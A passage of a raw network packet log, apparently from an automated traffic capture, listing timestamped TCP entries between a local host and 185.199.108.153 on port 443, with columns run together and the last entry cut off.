                                                                                                              Feb 10, 2025 19:58:21.693566084 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.693572998 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.693602085 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.693624973 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.693948984 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.693965912 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694016933 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694022894 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694086075 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694304943 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694324970 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694363117 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694370031 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694391966 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694417000 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694626093 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694644928 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694679976 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694685936 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.694716930 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694735050 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.694981098 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.695004940 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.695039988 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.695044994 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.695067883 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.695096016 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.736588001 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.736612082 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.736726999 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.736761093 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.736826897 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779242992 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779269934 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779335976 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779362917 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779381990 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779407978 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779447079 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779464006 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779498100 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779504061 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779530048 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779553890 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779659033 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779676914 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779723883 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779731035 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779774904 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779934883 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779952049 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780019999 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780026913 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780066967 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780128002 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780144930 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780184984 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780193090 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780237913 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780405045 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780421972 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780466080 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780473948 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780528069 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780841112 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780857086 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780889988 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780899048 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780929089 CET49711443